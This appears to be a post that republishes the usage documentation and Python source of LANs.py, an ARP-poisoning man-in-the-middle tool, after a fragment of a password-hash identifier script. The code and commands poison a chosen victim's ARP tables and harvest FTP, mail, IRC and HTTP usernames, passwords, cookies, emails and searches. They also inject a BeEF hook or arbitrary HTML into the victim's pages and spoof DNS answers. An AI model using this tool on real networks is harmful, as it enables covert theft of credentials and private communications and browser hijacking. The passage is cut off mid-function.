                    g.write(key + '\n')
            notifyCount += 1
            if (notifyCount % tenPercentCount) == 0:
                print '{0}/{1} hashes have been identified and written.'.format(notifyCount, validHashCount)
    print '\n{0} hashes have been identified and written to separate files based on hash type.\nA full list has been written to file {1}'.format(notifyCount, outputFile.name)

Sources - Documentation: https://github.com/SmeegeSec/HashTag
Smeege Sec: HashTag: Password Hash Identification
-
Multithreaded asynchronous packet parsing/injecting ARP poisoner. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays almost all the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

Prereqs: Linux, scapy, python nfqueue-bindings 0.4.3+, aircrack-ng, python twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you choose not to use the -ip option

Tested on Kali 1.0.

In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:

python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP]

Usage

Simplest usage (including active user targeting):

python LANs.py

Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending, so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Then you can Ctrl-C and pick your target which it will then ARP spoof. Simple target identification and ARP spoofing.

Passive harvesting:

python LANs.py -u -d -p -ip 192.168.0.10

-u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting
-d: open an xterm with driftnet to see all images they view
-p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received; will also decode base64 if the email authentication is encrypted with it
-ip: target this IP address

Easy to remember and will probably be the most common usage of the script: options u, d, p, like udp/tcp.

HTML injection:

python LANs.py -b http://192.168.0.5:3000/hook.js

Inject a BeEF hook URL (BeEF - The Browser Exploitation Framework Project, tutorial: The Browser Exploitation Framework (BeEF) – Part 1 - InfoSec Institute) into pages the victim visits.

python LANs.py -c '<title>Owned.</title>'

Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> and failing that injects prior to the first </head>. This example will change the page title to 'Owned.'

Read from pcap:

python LANs.py -pcap libpcapfilename -ip 192.168.0.10

To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

Most aggressive usage:

python LANs.py -v -d -p -n -na -set -dns facebook.com -r 74.125.225.64 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

#!/usr/bin/env python2
'''
Description:
ARP poisons a LAN victim and prints all the interesting unencrypted info like usernames, passwords and messages.
Asynchronous multithreaded arp spoofing packet parser.

Prerequisites:
Linux
nmap (optional)
nbtscan (optional)
aircrack-ng
Python 2.6+
nfqueue-bindings 0.4-3
scapy
twisted

Note: This script flushes iptables before and after usage.

To do:
Add karma MITM technique
Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through
Add anticaching (just edit the headers)
Ability to add option which will add a delay, allowing user to modify HTML/email/irc/usernames and passwords on the fly (how much interest is there in this?)
'''

__author__ = 'Dan McInerney'
__license__ = 'BSD'
__contact__ = 'danhmcinerney with gmail'
__version__ = 1.0

import os   # needed by the dependency prompt below, which calls os.system before the other imports

try:
    import nfqueue
except Exception:
    nfq = raw_input('[-] python-nfqueue not installed, would you like to install now? (apt-get install -y python-nfqueue will be run if yes) [y/n]: ')
    if nfq == 'y':
        os.system('apt-get install -y python-nfqueue')
    else:
        exit('[-] Exiting due to missing dependency')

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0
# Below is necessary to receive a response to the DHCP packets because we're sending to 255.255.255.255
# but receiving from the IP of the DHCP server
conf.checkIPaddr = 0
from sys import exit
from threading import Thread
import argparse
from os import geteuid, devnull
import signal
from base64 import b64decode
from subprocess import *
from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from twisted.internet.protocol import Protocol, Factory
from zlib import decompressobj, decompress
import gzip
from cStringIO import StringIO
import requests


def parse_args():
    # Create the arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-b", "--beef", help="Inject a BeEF hook URL. Example usage: -b http://192.168.0.3:3000/hook.js")
    parser.add_argument("-c", "--code", help="Inject arbitrary html. Example usage (include quotes): -c '<title>New title</title>'")
    parser.add_argument("-u", "--urlspy", help="Show all URLs and search terms the victim visits or enters minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation.", action="store_true")
    parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets. Usage: -ip <victim IP>")
    parser.add_argument("-vmac", "--victimmac", help="Set the victim MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary")
    parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")
    parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.", action="store_true")
    parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com")
    parser.add_argument("-set", "--setoolkit", help="Start Social Engineer's Toolkit in another window.", action="store_true")
    parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you.", action="store_true")
    parser.add_argument("-na", "--nmapaggressive", help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.", action="store_true")
    parser.add_argument("-n", "--nmap", help="Scan the target for open ports prior to starting to sniffing their packets.", action="store_true")
    parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.")
    parser.add_argument("-r", "--redirectto", help="Must be used with -dns DOMAIN option. Redirects the victim to the IP in this argument when they visit the domain in the -dns DOMAIN option")
    parser.add_argument("-rip", "--routerip", help="Set the router IP; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary")
    parser.add_argument("-rmac", "--routermac", help="Set the router MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary")
    parser.add_argument("-pcap", "--pcap", help="Parse through a pcap file")
    return parser.parse_args()


# Console colors
W = '\033[0m'    # white (normal)
R = '\033[31m'   # red
G = '\033[32m'   # green
O = '\033[33m'   # orange
B = '\033[34m'   # blue
P = '\033[35m'   # purple
C = '\033[36m'   # cyan
GR = '\033[37m'  # gray
T = '\033[93m'   # tan

logger = open('LANspy.log.txt', 'w+')
DN = open(devnull, 'w')


class Spoof():
    def originalMAC(self, ip):
        # srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=5, retry=3)
        for s, r in ans:
            return r.sprintf("%Ether.src%")

    def poison(self, routerIP, victimIP, routerMAC, victimMAC):
        send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
        send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))

    def restore(self, routerIP, victimIP, routerMAC, victimMAC):
        send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
        send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=routerMAC), count=3) class Parser(): # Mail, irc, post parsing OheadersFound = [] IheadersFound = [] IMAPauth = 0 IMAPdest = '' POPauth = 0 POPdest = '' Cookies = [] IRCnick = '' mail_passwds = [] oldmailack = '' oldmailload = '' mailfragged = 0 # http parsing oldHTTPack = '' oldHTTPload = '' HTTPfragged = 0 # html injection block_acks = [] html_url = '' user_agent = None def __init__(self, args): self.args = args def start(self, payload): if self.args.pcap: if self.args.ipaddress: try: pkt = payload[iP] except Exception: return else: try: pkt = IP(payload.get_data()) except Exception: return IP_layer = pkt[iP] IP_dst = pkt[iP].dst IP_src = pkt[iP].src if self.args.urlspy or self.args.post or self.args.beef or self.args.code: if pkt.haslayer(Raw): if pkt.haslayer(TCP): dport = pkt[TCP].dport sport = pkt[TCP].sport ack = pkt[TCP].ack seq = pkt[TCP].seq load = pkt[Raw].load mail_ports = [25, 26, 110, 143] if dport in mail_ports or sport in mail_ports: self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack) if dport == 6667 or sport == 6667: self.irc(load, dport, sport, IP_src) if dport == 21 or sport == 21: self.ftp(load, IP_dst, IP_src) if dport == 80 or sport == 80: self.http_parser(load, ack, dport) if self.args.beef or self.args.code: self.injecthtml(load, ack, pkt, payload, dport, sport) if self.args.dnsspoof: if pkt.haslayer(DNSQR): dport = pkt[uDP].dport sport = pkt[uDP].sport if dport == 53 or sport == 53: dns_layer = pkt[DNS] self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, payload) def get_user_agent(self, header_lines): for h in header_lines: user_agentre = re.search('[uu]ser-[Aa]gent: ', h) if user_agentre: return h.split(user_agentre.group(), 1)[1] def injecthtml(self, load, ack, pkt, payload, dport, sport): for x in self.block_acks: if ack == x: payload.set_verdict(nfqueue.NF_DROP) return ack = str(ack) if self.args.beef: bhtml = '<script src='+self.args.beef+'></script>' if self.args.code: chtml = self.args.code try: headers, body 
= load.split("\r\n\r\n", 1) except Exception: headers = load body = '' header_lines = headers.split("\r\n") if dport == 80: post = None get = self.get_get(header_lines) host = self.get_host(header_lines) self.html_url = self.get_url(host, get, post) if self.html_url: d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] if any(i in self.html_url for i in d): self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return else: payload.set_verdict(nfqueue.NF_ACCEPT) return self.user_agent = "'"+self.get_user_agent(header_lines)+"'" if not self.user_agent: # Most common user-agent on the internet self.user_agent = "'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36'" payload.set_verdict(nfqueue.NF_ACCEPT) return if sport == 80 and self.html_url and 'Content-Type: text/html' in headers: # This can be done better, probably using filter() header_lines = [x for x in header_lines if 'transfer-encoding' not in x.lower()] for h in header_lines: if '1.1 302' in h or '1.1 301' in h: # Allow redirects to go thru unperturbed payload.set_verdict(nfqueue.NF_ACCEPT) self.html_url = None return UA_header = {'User-Agent':self.user_agent} r = requests.get('http://'+self.html_url, headers=UA_header) try: body = r.text.encode('utf-8') except Exception: payload.set_verdict(nfqueue.NF_ACCEPT) debugger = open('/home/user/projects/origBody', 'w') debugger.write(body) debugger.close() # INJECT if self.args.beef: if '<html' in body or '/html>' in body: try: psplit = body.split('</head>', 1) body = psplit[0]+bhtml+'</head>'+psplit[1] except Exception: try: psplit = body.split('<head>', 1) body = psplit[0]+'<head>'+bhtml+psplit[1] except Exception: if not self.args.code: self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return else: pass if self.args.code: if '<html' in body or '/html>' in body: try: psplit = body.split('<head>', 1) body = psplit[0]+'<head>'+chtml+psplit[1] except Exception: try: 
psplit = body.split('</head>', 1) body = psplit[0]+chtml+'</head>'+psplit[1] except Exception: self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return # Recompress data if necessary if 'Content-Encoding: gzip' in headers: if body != '': # debugger = open('/home/user/projects/injectedBody', 'w') # debugger.write(body) # debugger.close() try: comp_body = StringIO() f = gzip.GzipFile(fileobj=comp_body, mode='w', compresslevel = 9) f.write(body) f.close() body = comp_body.getvalue() except Exception: try: pkt[Raw].load = headers+"\r\n\r\n"+body pkt[iP].len = len(str(pkt)) del pkt[iP].chksum del pkt[TCP].chksum payload.set_verdict(nfqueue.NF_DROP) send(pkt) print '[-] Could not recompress html, sent packet as is' self.html_url = None return except Exception: self.html_url = None payload.set_verdict(nfqueue.NF_ACCEPT) return headers = "\r\n".join(header_lines) pkt[Raw].load = headers+"\r\n\r\n"+body pkt[iP].len = len(str(pkt)) del pkt[iP].chksum del pkt[TCP].chksum try: send(pkt) print R+'[!] Injected HTML into packet for '+W+self.html_url logger.write('[!] 
Injected HTML into packet for '+self.html_url) self.block_acks.append(ack) payload.set_verdict(nfqueue.NF_DROP) self.html_url = None except Exception: payload.set_verdict(nfqueue.NF_ACCEPT) self.html_url = None print '[-] Failed to inject packet' return if len(self.block_acks) > 30: self.block_acks = self.block_acks[5:] def get_host(self, header_lines): for l in header_lines: searchHost = re.search('[Hh]ost: ', l) if searchHost: try: return l.split('Host: ', 1)[1] except Exception: try: return l.split('host: ', 1)[1] except Exception: return def get_get(self, header_lines): for l in header_lines: searchGet = re.search('GET /', l) if searchGet: try: return l.split('GET ')[1].split(' ')[0] except Exception: return def get_post(self, header_lines): for l in header_lines: searchPost = re.search('POST /', l) if searchPost: try: return l.split(' ')[1].split(' ')[0] except Exception: return def get_url(self, host, get, post): if host: if post: return host+post if get: return host+get # Catch search terms # As it stands now this has a moderately high false positive rate mostly due to the common ?s= and ?q= vars # I figured better to err on the site of more data than less and it's easy to tell the false positives from the real searches def searches(self, url, host): # search, query, search?q, ?s, &q, ?q, search?p, searchTerm, keywords, command searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|search[Tt]erm|keywords|command)=([^&][^&]*))', url) if searched: searched = searched.group(3) # Common false positives if 'select%20*%20from' in searched: pass if host == 'geo.yahoo.com': pass else: searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$') print T+'[+] Searched '+W+host+T+': '+searched+W logger.write('[+] Searched '+host+ ' for: '+searched+'\n') def post_parser(self, url, body, host, 
header_lines): if 'ocsp' in url: print B+'[+] POST: '+W+url logger.write('[+] POST: '+url+'\n') elif body != '': try: urlsplit = url.split('/') url = urlsplit[0]+'/'+urlsplit[1] except Exception: pass if self.HTTPfragged == 1: print B+'[+] Fragmented POST: '+W+url+B+" HTTP POST's combined load: "+body+W logger.write('[+] Fragmented POST: '+url+" HTTP POST's combined load: "+body+'\n') else: print B+'[+] POST: '+W+url+B+' HTTP POST load: '+body+W logger.write('[+] POST: '+url+" HTTP POST's combined load: "+body+'\n') # If you see any other login/pw variable names, tell me and I'll add em in here # As it stands now this has a moderately high false positive rate; I figured better to err on the site of more data than less # email, user, username, name, login, log, loginID user_regex = '([Ee]mail|[uu]ser|[uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[ii][Dd])=([^&|;]*)' # password, pass, passwd, pwd, psw, passwrd, passw pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][ss][Ww]|[Pp]asswrd|[Pp]assw)=([^&|;]*)' username = re.findall(user_regex, body) password = re.findall(pw_regex, body) self.user_pass(username, password) self.cookies(host, header_lines) def http_parser(self, load, ack, dport): load = repr(load)[1:-1] # Catch fragmented HTTP posts if dport == 80 and load != '': if ack == self.oldHTTPack: self.oldHTTPload = self.oldHTTPload+load load = self.oldHTTPload self.HTTPfragged = 1 else: self.oldHTTPload = load self.oldHTTPack = ack self.HTTPfragged = 0 try: headers, body = load.split(r"\r\n\r\n", 1) except Exception: headers = load body = '' header_lines = headers.split(r"\r\n") host = self.get_host(header_lines) get = self.get_get(header_lines) post = self.get_post(header_lines) url = self.get_url(host, get, post) # print urls if url: #Print the URL if self.args.verboseURL: print '[*] '+url logger.write('[*] '+url+'\n') if self.args.urlspy: d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] if any(i in url for i in d): return if 
len(url) > 146: print '[*] '+url[:145] logger.write('[*] '+url[:145]+'\n') else: print '[*] '+url logger.write('[*] '+url+'\n') # Print search terms self.searches(url, host) #Print POST load and find cookies if self.args.post and post: self.post_parser(url, body, host, header_lines) def ftp(self, load, IP_dst, IP_src): load = repr(load)[1:-1].replace(r"\r\n", "") if 'USER ' in load: print R+'[!] FTP '+load+' SERVER: '+IP_dst+W logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n') if 'PASS ' in load: print R+'[!] FTP '+load+' SERVER: '+IP_dst+W logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n') if 'authentication failed' in load: print R+'[*] FTP '+load+W logger.write('[*] FTP '+load+'\n') def irc(self, load, dport, sport, IP_src): load = repr(load)[1:-1].split(r"\r\n") if self.args.post: if IP_src == victimIP: if 'NICK ' in load[0]: self.IRCnick = load[0].split('NICK ')[1] server = load[1].replace('USER user user ', '').replace(' :user', '') print R+'[!] IRC username: '+self.IRCnick+' on '+server+W logger.write('[!] IRC username: '+self.IRCnick+' on '+server+'\n') if 'NS IDENTIFY ' in load[0]: ircpass = load[0].split('NS IDENTIFY ')[1] print R+'[!] IRC password: '+ircpass+W logger.write('[!] 
IRC password: '+ircpass+'\n') if 'JOIN ' in load[0]: join = load[0].split('JOIN ')[1] print C+'[+] IRC joined: '+W+join logger.write('[+] IRC joined: '+join+'\n') if 'PART ' in load[0]: part = load[0].split('PART ')[1] print C+'[+] IRC left: '+W+part logger.write('[+] IRC left: '+part+'\n') if 'QUIT ' in load[0]: quit = load[0].split('QUIT :')[1] print C+'[+] IRC quit: '+W+quit logger.write('[+] IRC quit: '+quit+'\n') # Catch messages from the victim to an IRC channel if 'PRIVMSG ' in load[0]: if IP_src == victimIP: load = load[0].split('PRIVMSG ')[1] channel = load.split(' :', 1)[0] ircmsg = load.split(' :', 1)[1] if self.IRCnick != '': print C+'[+] IRC victim '+W+self.IRCnick+C+' to '+W+channel+C+': '+ircmsg+W logger.write('[+] IRC '+self.IRCnick+' to '+channel+': '+ircmsg+'\n') else: print C+'[+] IRC msg to '+W+channel+C+': '+ircmsg+W logger.write('[+] IRC msg to '+channel+':'+ircmsg+'\n') # Catch messages from others that tag the victim's nick elif self.IRCnick in load[0] and self.IRCnick != '': sender_nick = load[0].split(':', 1)[1].split('!', 1)[0] try: load = load[0].split('PRIVMSG ')[1].split(' :', 1) channel = load[0] ircmsg = load[1] print C+'[+] IRC '+W+sender_nick+C+' to '+W+channel+C+': '+ircmsg[1:]+W logger.write('[+] IRC '+sender_nick+' to '+channel+': '+ircmsg[1:]+'\n') except Exception: return def cookies(self, host, header_lines): for x in header_lines: if 'Cookie:' in x: if x in self.Cookies: return elif 'safebrowsing.clients.google.com' in host: return else: self.Cookies.append(x) print P+'[+] Cookie found for '+W+host+P+' logged in LANspy.log.txt'+W logger.write('[+] Cookie found for'+host+':'+x.replace('Cookie: ', '')+'\n') def user_pass(self, username, password): if username: for u in username: print R+'[!] Username found: '+u[1]+W logger.write('[!] Username: '+u[1]+'\n') if password: for p in password: if p[1] != '': print R+'[!] Password: '+p[1]+W logger.write('[!] 
Password: '+p[1]+'\n') def mailspy(self, load, dport, sport, IP_dst, IP_src, mail_ports, ack): load = repr(load)[1:-1] # Catch fragmented mail packets if ack == self.oldmailack: if load != r'.\r\n': self.oldmailload = self.oldmailload+load load = self.oldmailload self.mailfragged = 1 else: self.oldmailload = load self.oldmailack = ack self.mailfragged = 0 try: headers, body = load.split(r"\r\n\r\n", 1) except Exception: headers = load body = '' header_lines = headers.split(r"\r\n") email_headers = ['Date: ', 'Subject: ', 'To: ', 'From: '] # Find passwords if dport in [25, 26, 110, 143]: self.passwords(IP_src, load, dport, IP_dst) # Find outgoing messages if dport == 26 or dport == 25: self.outgoing(load, body, header_lines, email_headers, IP_src) # Find incoming messages if sport in [110, 143]: self.incoming(headers, body, header_lines, email_headers, sport, dport) def passwords(self, IP_src, load, dport, IP_dst): load = load.replace(r'\r\n', '') if dport == 143 and IP_src == victimIP and len(load) > 15: if self.IMAPauth == 1 and self.IMAPdest == IP_dst: # Don't double output mail passwords for x in self.mail_passwds: if load in x: self.IMAPauth = 0 self.IMAPdest = '' return print R+'[!] IMAP user and pass found: '+load+W logger.write('[!] IMAP user and pass found: '+load+'\n') self.mail_passwds.append(load) self.decode(load, dport) self.IMAPauth = 0 self.IMAPdest = '' if "authenticate plain" in load: self.IMAPauth = 1 self.IMAPdest = IP_dst if dport == 110 and IP_src == victimIP: if self.POPauth == 1 and self.POPdest == IP_dst and len(load) > 10: # Don't double output mail passwords for x in self.mail_passwds: if load in x: self.POPauth = 0 self.POPdest = '' return print R+'[!] POP user and pass found: '+load+W logger.write('[!] 
POP user and pass found: '+load+'\n') self.mail_passwds.append(load) self.decode(load, dport) self.POPauth = 0 self.POPdest = '' if 'AUTH PLAIN' in load: self.POPauth = 1 self.POPdest = IP_dst if dport == 26: if 'AUTH PLAIN ' in load: # Don't double output mail passwords for x in self.mail_passwds: if load in x: self.POPauth = 0 self.POPdest = '' return print R+'[!] Mail authentication found: '+load+W logger.write('[!] Mail authentication found: '+load+'\n') self.mail_passwds.append(load) self.decode(load, dport) def outgoing(self, headers, body, header_lines, email_headers, IP_src): if 'Message-ID' in headers: for l in header_lines: for x in email_headers: if x in l: self.OheadersFound.append(l) # if date, from, to, in headers then print the message if len(self.OheadersFound) > 3 and body != '': if self.mailfragged == 1: print O+'[!] OUTGOING MESSAGE (fragmented)'+W logger.write('[!] OUTGOING MESSAGE (fragmented)\n') for x in self.OheadersFound: print O+' ',x+W logger.write(' '+x+'\n') print O+' Message:',body+W logger.write(' Message:'+body+'\n') else: print O+'[!] OUTGOING MESSAGE'+W logger.write('[!] OUTGOING MESSAGE\n') for x in self.OheadersFound: print O+' ',x+W logger.write(' '+x+'\n') print O+' Message:',body+W logger.write(' Message:'+body+'\n') self.OheadersFound = [] def incoming(self, headers, body, header_lines, email_headers, sport, dport): message = '' for l in header_lines: for x in email_headers: if x in l: self.IheadersFound.append(l) if len(self.IheadersFound) > 3 and body != '': if "BODY[TEXT]" not in body: try: beginning = body.split(r"\r\n", 1)[0] body1 = body.split(r"\r\n\r\n", 1)[1] message = body1.split(beginning)[0][:-8] #get rid of last \r\n\r\n except Exception: return if message != '': if self.mailfragged == 1: print O+'[!] INCOMING MESSAGE (fragmented)'+W logger.write('[!] 
INCOMING MESSAGE (fragmented)\n') for x in self.IheadersFound: print O+' '+x+W logger.write(' '+x+'\n') print O+' Message: '+message+W logger.write(' Message: '+message+'\n') else: print O+'[!] INCOMING MESSAGE'+W logger.write('[!] INCOMING MESSAGE\n') for x in self.IheadersFound: print O+' '+x+W logger.write(' '+x+'\n') print O+' Message: '+message+W logger.write(' Message: '+message+'\n') self.IheadersFound = [] def decode(self, load, dport): decoded = '' if dport == 25 or dport == 26: try: b64str = load.replace("AUTH PLAIN ", "").replace(r"\r\n", "") decoded = repr(b64decode(b64str))[1:-1].replace(r'\x00', ' ') except Exception: pass else: try: b64str = load decoded = repr(b64decode(b64str))[1:-1].replace(r'\x00', ' ') except Exception: pass # Test to see if decode worked if '@' in decoded: print R+'[!] Decoded:'+decoded+W logger.write('[!] Decoded:'+decoded+'\n') # Spoof DNS for a specific domain to point to your machine # Make this more reliable by blocking all DNS responses from the server using the IP_src maybe a self.dnsSrc var def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, payload): if self.args.dnsspoof: if self.args.dnsspoof in dns_layer.qd.qname and not self.args.redirectto: localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0] self.dnsspoof_actions(dns_layer, IP_src, IP_dst, sport, dport, payload, localIP) elif self.args.dnsspoof in dns_layer.qd.qname and self.args.redirectto: self.dnsspoof_actions(dns_layer, IP_src, IP_dst, sport, dport, payload, self.args.redirectto) def dnsspoof_actions(self, dns_layer, IP_src, IP_dst, sport, dport, payload, rIP): payload.set_verdict(nfqueue.NF_DROP) print G+'[+] DNS request for '+W+self.args.dnsspoof+G+' found; dropping packet and injecting spoofed one redirecting to '+W+rIP logger.write('[+] DNS request for '+self.args.dnsspoof+' found; dropping packet and injecting spoofed one redirecting to '+rIP+'\n') p = IP(dst=IP_src, src=IP_dst)/UDP(dport=sport, 
sport=dport)/DNS(id=dns_layer.id, qr=1, aa=1, qd=dns_layer.qd, an=DNSRR(rrname=dns_layer.qd.qname, ttl=10, rdata=rIP)) send(p) print G+'[!] Sent spoofed packet for '+W+self.args.dnsspoof+G+' to '+W+rIP logger.write('[!] Sent spoofed packet for '+self.args.dnsspoof+' to '+rIP+'\n') #Wrap the nfqueue object in an IReadDescriptor and run the process_pending function in a .doRead() of the twisted IReadDescriptor class Queued(object): def __init__(self, args): self.q = nfqueue.queue() self.q.set_callback(Parser(args).start) self.q.fast_open(0, socket.AF_INET) self.q.set_queue_maxlen(5000) reactor.addReader(self) self.q.set_mode(nfqueue.NFQNL_COPY_PACKET) print '[*] Flushed firewall and forwarded traffic to the queue; waiting for data' def fileno(self): return self.q.get_fd() def doRead(self): self.q.process_pending(20) def connectionLost(self, reason): reactor.removeReader(self) def logPrefix(self): return 'queued' class active_users(): IPandMAC = [] start_time = time.time() current_time = 0 monmode = '' def pkt_cb(self, pkt): if pkt.haslayer(Dot11): pkt = pkt[Dot11] if pkt.type == 2: addresses = [pkt.addr1.upper(), pkt.addr2.upper(), pkt.addr3.upper()] for x in addresses: for y in self.IPandMAC: if x in y[1]: y[2] = y[2]+1 self.current_time = time.time() if self.current_time > self.start_time+1: self.IPandMAC.sort(key=lambda x: float(x[2]), reverse=True) # sort by data packets os.system('/usr/bin/clear') print '[*] '+T+'IP address'+W+' and '+R+'data packets'+W+' sent/received' print '---------------------------------------------' for x in self.IPandMAC: if len(x) == 3: ip = x[0].ljust(16) data = str(x[2]).ljust(5) print T+ip+W, R+data+W else: ip = x[0].ljust(16) data = str(x[2]).ljust(5) print T+ip+W, R+data+W, x[3] print '\n[*] Hit Ctrl-C at any time to stop and choose a victim IP' self.start_time = time.time() def users(self, IPprefix, routerIP): print '[*] Running ARP ping to identify users on the network; this may take a minute...' 
iplist = [] maclist = [] try: nmap = Popen(['/usr/bin/nmap', '-sn', '-n', IPprefix], stdout=PIPE, stderr=DN) nmap = nmap.communicate()[0] nmap = nmap.splitlines()[2:-1] except Exception: print '[-] Nmap ARP ping failed, is nmap installed?' for x in nmap: if 'Nmap' in x: pieces = x.split() nmapip = pieces[len(pieces)-1] nmapip = nmapip.replace('(','').replace(')','') iplist.append(nmapip) if 'MAC' in x: nmapmac = x.split()[2] maclist.append(nmapmac) zipped = zip(iplist, maclist) self.IPandMAC = [list(item) for item in zipped] # Make sure router is caught in the arp ping r = 0 for i in self.IPandMAC: i.append(0) if r == 0: if routerIP == i[0]: i.append('router') routerMAC = i[1] r = 1 if r == 0: exit('[-] Router MAC not found. Exiting.') # Do nbtscan for windows netbios names print '[*] Running nbtscan to get Windows netbios names' try: nbt = Popen(['nbtscan', IPprefix], stdout=PIPE, stderr=DN) nbt = nbt.communicate()[0] nbt = nbt.splitlines() nbt = nbt[4:] except Exception: print '[-] nbtscan error, are you sure it is installed?' for l in nbt: try: l = l.split() nbtip = l[0] nbtname = l[1] except Exception: print '[-] Could not find any netbios names. 
Continuing without them' if nbtip and nbtname: for a in self.IPandMAC: if nbtip == a[0]: a.append(nbtname) # Start monitor mode print '[*] Enabling monitor mode [/usr/sbin/airmon-ng ' + 'start ' + interface + ']' try: promiscSearch = Popen(['/usr/sbin/airmon-ng', 'start', '%s' % interface], stdout=PIPE, stderr=DN) promisc = promiscSearch.communicate()[0] monmodeSearch = re.search('monitor mode enabled on (.+)\)', promisc) self.monmode = monmodeSearch.group(1) except Exception: exit('[-] Enabling monitor mode failed, do you have aircrack-ng installed?') sniff(iface=self.monmode, prn=self.pkt_cb, store=0) #Print all the variables def print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP): print "[*] Active interface: " + interface print "[*] DHCP server: " + DHCPsrvr print "[*] DNS server: " + dnsIP print "[*] Local domain: " + local_domain print "[*] Router IP: " + routerIP print "[*] Victim IP: " + victimIP logger.write("[*] Router IP: " + routerIP+'\n') logger.write("[*] victim IP: " + victimIP+'\n') #Enable IP forwarding and flush possibly conflicting iptables rules def setup(victimMAC): open('/proc/sys/net/ipv4/ip_forward', 'w').write('1\n') print '[*] Enabled IP forwarding' os.system('/sbin/iptables -F') os.system('/sbin/iptables -X') os.system('/sbin/iptables -t nat -F') os.system('/sbin/iptables -t nat -X') # Just throw packets that are from and to the victim into the reactor os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP) # To catch DNS packets you gotta do prerouting rather than forward for some reason? 
